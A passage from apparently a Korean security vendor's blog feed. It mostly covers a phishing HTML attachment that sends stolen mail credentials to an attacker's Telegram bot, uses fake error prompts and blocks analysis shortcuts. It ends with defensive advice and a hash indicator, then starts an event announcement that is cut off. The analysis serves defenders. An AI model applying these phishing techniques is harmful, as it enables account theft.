&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;④&lt;/span&gt; 계정 정보 탈취 및&lt;span&gt; Telegram &lt;/span&gt;실시간 전송&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;사용자가 로그인 화면에 입력한 정보는 공격자가 제어하는&lt;span&gt; Telegram Bot API&lt;/span&gt;를 통해 실시간으로 전송됩니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;탈취 항목:&amp;nbsp; 사용자 이메일 계정, 비밀번호,&amp;nbsp; 브라우저 정보 (첨부된 HTML 파일 실행 브라우저 유형)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;855&quot; data-origin-height=&quot;246&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bC1VZZ/dJMcafyLyQN/4D5kADFtqKZpAqZiT9T5S1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bC1VZZ/dJMcafyLyQN/4D5kADFtqKZpAqZiT9T5S1/img.png&quot; data-alt=&quot;[그림 5] 계정 정보 탈취 코드&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bC1VZZ/dJMcafyLyQN/4D5kADFtqKZpAqZiT9T5S1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbC1VZZ%2FdJMcafyLyQN%2F4D5kADFtqKZpAqZiT9T5S1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;855&quot; height=&quot;246&quot; data-origin-width=&quot;855&quot; data-origin-height=&quot;246&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 5] 계정 정보 탈취 코드&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;830&quot; data-origin-height=&quot;553&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/qaTVv/dJMcafyLySl/aork25p45F79csKK4mDxfk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/qaTVv/dJMcafyLySl/aork25p45F79csKK4mDxfk/img.png&quot; data-alt=&quot;[그림 6] 공격자에게 전송되는 계정 정보&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/qaTVv/dJMcafyLySl/aork25p45F79csKK4mDxfk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FqaTVv%2FdJMcafyLySl%2Faork25p45F79csKK4mDxfk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;830&quot; height=&quot;553&quot; data-origin-width=&quot;830&quot; data-origin-height=&quot;553&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 6] 공격자에게 전송되는 계정 정보&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;611&quot; data-origin-height=&quot;413&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ILTjk/dJMcaiCc6SK/1qkl5TPTj6Qzy9GGtj3jpK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ILTjk/dJMcaiCc6SK/1qkl5TPTj6Qzy9GGtj3jpK/img.png&quot; data-alt=&quot;[그림 7] 공격자의 텔레그램 봇 계정&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ILTjk/dJMcaiCc6SK/1qkl5TPTj6Qzy9GGtj3jpK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FILTjk%2FdJMcaiCc6SK%2F1qkl5TPTj6Qzy9GGtj3jpK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;611&quot; height=&quot;413&quot; data-origin-width=&quot;611&quot; data-origin-height=&quot;413&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 7] 공격자의 텔레그램 봇 계정&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: justify;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;⑤&lt;/span&gt; 재입력 유도&lt;/b&gt;&lt;b&gt; 및 정상 사이트로 리다이렉트 &lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;입력 정보의 정확도를 높이기 위해 최소&lt;span&gt; 2&lt;/span&gt;회까지 가짜 오류 메시지&lt;span&gt;(&lt;/span&gt;인증 또는 시스템 오류&lt;span&gt;)&lt;/span&gt;를 표시하여 사용자가 비밀번호를 반복 입력하도록 유도합니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이후 정상 메일 서비스 페이지로 이동시켜 사용자가 피싱 공격을 인지하기 어렵게 만듭니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;873&quot; data-origin-height=&quot;795&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/wgK2f/dJMcafS3qph/1Nl70kKoeJutSZJSAqoGM1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/wgK2f/dJMcafS3qph/1Nl70kKoeJutSZJSAqoGM1/img.png&quot; data-alt=&quot;[그림 8] 비밀번호 입력 시 팝업되는 가짜 오류메세지&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/wgK2f/dJMcafS3qph/1Nl70kKoeJutSZJSAqoGM1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FwgK2f%2FdJMcafS3qph%2F1Nl70kKoeJutSZJSAqoGM1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;873&quot; height=&quot;795&quot; data-origin-width=&quot;873&quot; data-origin-height=&quot;795&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 8] 비밀번호 입력 시 팝업되는 가짜 오류메세지&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;3.&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;분석 방해 기능&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;첨부된 &lt;span&gt;HTML &lt;/span&gt;파일 내부 코드에는 분석가의 코드 분석을 방해하기 위해 다음과 같은 기법이 적용되어 있습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;스크립트 난독화&lt;/b&gt;&lt;span&gt;: &lt;/span&gt;함수와 변수명을 무작위 문자열로 치환하여 가독성을 떨어뜨립니다&lt;span&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;마우스 우클릭 및 개발자 도구 차단&lt;/b&gt;&lt;span&gt;: &lt;/span&gt;웹 페이지 내에서의 마우스 우클릭 및 주요 단축키 입력을 차단합니다&lt;span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;display: flex; flex-direction: column; align-items: center; width: 100%;&quot;&gt;
&lt;table style=&quot;border-collapse: collapse; width: 90; min-width: 600px; white-space: nowrap;&quot; border=&quot;1&quot; data-ke-align=&quot;alignCenter&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt; &lt;b&gt;분류&lt;/b&gt; &lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt; &lt;b&gt;차단 항목&lt;/b&gt; &lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;span style=&quot;color: #1f1f1f;&quot;&gt;우클릭&lt;/span&gt;&lt;/td&gt;
&lt;td&gt;&lt;span style=&quot;color: #444746;&quot;&gt;contextmenu&lt;/span&gt;&lt;span style=&quot;color: #1f1f1f;&quot;&gt; (&lt;/span&gt;&lt;span style=&quot;color: #1f1f1f;&quot;&gt;마우스 우클릭 메뉴&lt;span&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;span style=&quot;color: #1f1f1f;&quot;&gt;개발자 도구&lt;/span&gt;&lt;/td&gt;
&lt;td&gt;&lt;span style=&quot;color: #1f1f1f;&quot;&gt;F12, Ctrl+Shift+I&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;span style=&quot;color: #1f1f1f;&quot;&gt;소스 보기&lt;/span&gt;&lt;/td&gt;
&lt;td&gt;&lt;span style=&quot;color: #1f1f1f;&quot;&gt;Ctrl+U&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;span style=&quot;color: #1f1f1f;&quot;&gt;페이지 저장&lt;/span&gt;&lt;/td&gt;
&lt;td&gt;&lt;span style=&quot;color: #1f1f1f;&quot;&gt;Ctrl+S&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;span style=&quot;color: #1f1f1f;&quot;&gt;복사&lt;span&gt;/&lt;/span&gt;선택&lt;/span&gt;&lt;/td&gt;
&lt;td&gt;&lt;span style=&quot;color: #1f1f1f;&quot;&gt;Ctrl+C, Ctrl+A, Ctrl+X&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;[표 1] 차단되는 항목&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;4.&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;보안 권고 사항 및 예방 방법&lt;/b&gt;&lt;b&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;기업 메일을 사용하는 환경에서는 다음 예방 수칙을 반드시 준수하여 피해를 방지하시기 바랍니다&lt;span&gt;.&lt;/span&gt;&lt;b&gt;&lt;/b&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;첨부된 HTML 파일 내 로그인 금지&lt;/b&gt;: 메일 첨부파일인 HTML을 실행했을 때, 계정 정보 입력을 요구한다면 피싱일 가능성이 매우 높습니다. 공식 기관은 첨부파일을 통해 기관 공식 사이트 로그인을 진행하도록 안내하지 않습니다.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;다요소 인증&lt;span&gt;(MFA) &lt;/span&gt;필수 설정:&lt;/b&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;피싱 페이지에서 비밀번호를 입력했더라도&lt;span&gt;, OTP(&lt;/span&gt;일회용 비밀번호&lt;span&gt;)&lt;/span&gt;나 생체 인증 등 추가 수단이 설정되어 있다면 공격자가 계정에 최종 로그인하는 것을 차단할 수 있습니다&lt;span&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;보안 인식 교육 및 정책 강화: &lt;/b&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;기업은 정기적인 피싱 대응 교육&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;메일 보안 정책&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;접근 통제 및 이상 로그인 모니터링을 통해 조직 차원의 대응 체계를 강화해야 합니다.&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번 공격은 단순한 대량 유포형 피싱이 아닌&lt;span&gt;, &lt;/span&gt;&lt;b&gt;수신자의 이메일 도메인을 분석하여 기업 사용자를 정밀 타겟팅하는 고도화된 공격&lt;/b&gt;이라는 점에서 더욱 위험합니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;특히 공문&lt;span&gt;/&lt;/span&gt;정부기관&lt;span&gt;/&lt;/span&gt;협력사 등을 사칭하는 공격은 실제 업무 흐름과 유사해 사용자가 쉽게 속을 수 있습니다&lt;span&gt;. &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;&lt;span&gt;의심스러운 메일의 첨부파일 실행과 계정 정보 입력은 곧바로 계정 탈취로 이어질 수 있으므로&lt;span&gt;, &lt;/span&gt;기업사용자 분들은 보안 수칙을 생활화하고 조직 차원의 지속적인 보안 인식 교육과 점검이 필요합니다&lt;span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;ioc-container&quot;&gt;
&lt;div class=&quot;ioc-container&quot;&gt;
&lt;h4 style=&quot;font-weight: bold; color: #1a2c4e; margin-bottom: 15px;&quot; data-ke-size=&quot;size20&quot;&gt;IoC&lt;/h4&gt;
&lt;table style=&quot;width: 100%; border-collapse: collapse; line-height: 1.6; font-size: 14px; height: 46px;&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;thead&gt;
&lt;tr style=&quot;border-top: 2px solid #e1e4e8; border-bottom: 1px solid #e1e4e8; text-align: left; background-color: #fcfcfc; height: 22px;&quot;&gt;
&lt;th style=&quot;padding: 15px 10px; width: 40.5815%; color: #333333; height: 22px;&quot;&gt;Indicator&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 12.2093%; color: #333333; height: 22px;&quot;&gt;Type&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 23.6046%; color: #333333; height: 22px;&quot;&gt;Description&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 23.6046%; color: #333333;&quot;&gt;Detection Name&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; width: 40.5815%; height: 24px;&quot;&gt;21DB441D894FAC05C3C4B9085877F49C&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 12.2093%; height: 24px;&quot;&gt;MD5&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 23.6046%; height: 24px;&quot;&gt;피싱 HTML 파일&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 23.6046%;&quot;&gt;Trojan.HTML.Phish&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;&gt;&lt;a href=&quot;https://www.estsecurity.com/&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/BeCB9/dJMcafFvZVr/p8ZmREfGEd9i7h8WZIrPbK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FBeCB9%2FdJMcafFvZVr%2Fp8ZmREfGEd9i7h8WZIrPbK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;150&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;</description>
      <category>악성코드 분석 리포트</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5716</guid>
      <comments>https://alyacofficialblog.tistory.com/5716#entry5716comment</comments>
      <pubDate>Fri, 6 Feb 2026 15:37:10 +0900</pubDate>
    </item>
    <item>
      <title>이스트시큐리티 공인 파트너 대상, &amp;lsquo;파트너 킥오프(Kick-Off) 2026&amp;rsquo; 행사 성료</title>
      <link>https://alyacofficialblog.tistory.com/5715</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이스트시큐리티가 지난 2월 5일, 서울 양재 엘타워 오르체홀에서 공인 파트너사를 대상으로&lt;b&gt; &amp;lsquo;EST Partner Kick-Off 2026&amp;rsquo;&lt;/b&gt; 행사를 개최하고, 2026년 사업 전략과 AI 기반 보안 비전을 공유하는 뜻깊은 시간을 가졌습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;이번 행사는 약 80개 파트너사, 100여 명의 파트너 관계자분들이 참석한 가운데 성황리에 마무리되었으며, &lt;/span&gt;AI와 보안이 만나는 새로운 전환점을 현장에서 생생하게 확인할 수 있었던 자리였습니다. 지금부터 그 뜨거웠던 현장을 공개합니다!&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 5.png&quot; data-origin-width=&quot;960&quot; data-origin-height=&quot;640&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cv7WXp/dJMcagxBzEz/d1IGmXbhGxyh0Y57gD3SYk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cv7WXp/dJMcagxBzEz/d1IGmXbhGxyh0Y57gD3SYk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cv7WXp/dJMcagxBzEz/d1IGmXbhGxyh0Y57gD3SYk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcv7WXp%2FdJMcagxBzEz%2Fd1IGmXbhGxyh0Y57gD3SYk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;960&quot; height=&quot;640&quot; data-filename=&quot;Group 5.png&quot; data-origin-width=&quot;960&quot; data-origin-height=&quot;640&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;파트너와&amp;nbsp;함께&amp;nbsp;그리는&amp;nbsp;Security&amp;nbsp;&amp;times;&amp;nbsp;AI&amp;nbsp;:&amp;nbsp;New&amp;nbsp;Momentum&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;이번 Partner Kick-Off는 급변하는 보안 시장 환경 속에서 이스트시큐리티가 지향하는 중장기 사업 방향과 기술 전략을 파트너 여러분과 함께 공유하고, 동반 성장을 위한 협업 체계를 한층 강화하기 위해 마련된 자리입니다.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;특히 새롭게 선임된 정상원 &lt;/span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;대표이사가 직접 참석해 이스트시큐리티의 비전과 2026년 핵심 전략을 파트너사와 함께 나누며 행사의 의미를 더했습니다.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;2026년을&amp;nbsp;향한&amp;nbsp;핵심&amp;nbsp;메시지,&amp;nbsp;&amp;nbsp;Security&amp;nbsp;&amp;times;&amp;nbsp;AI&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이번 행사는 정상원 대표이사의 인사말을 시작으로, 이스트시큐리티의 미래 전략을 다각도로 조망할 수 있는 주요 세션들로 구성되었습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;이미지 (10).png&quot; data-origin-width=&quot;810&quot; data-origin-height=&quot;538&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/LSKLv/dJMcaiPGN53/lKp518JpaB0emLfCoypl21/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/LSKLv/dJMcaiPGN53/lKp518JpaB0emLfCoypl21/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/LSKLv/dJMcaiPGN53/lKp518JpaB0emLfCoypl21/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FLSKLv%2FdJMcaiPGN53%2FlKp518JpaB0emLfCoypl21%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;810&quot; height=&quot;538&quot; data-filename=&quot;이미지 (10).png&quot; data-origin-width=&quot;810&quot; data-origin-height=&quot;538&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 9.png&quot; data-origin-width=&quot;960&quot; data-origin-height=&quot;720&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dfFM6r/dJMcajujDar/7BoOS9UBTPpOFziIP3PHGK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dfFM6r/dJMcajujDar/7BoOS9UBTPpOFziIP3PHGK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dfFM6r/dJMcajujDar/7BoOS9UBTPpOFziIP3PHGK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdfFM6r%2FdJMcajujDar%2F7BoOS9UBTPpOFziIP3PHGK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;810&quot; height=&quot;608&quot; data-filename=&quot;Group 9.png&quot; data-origin-width=&quot;960&quot; 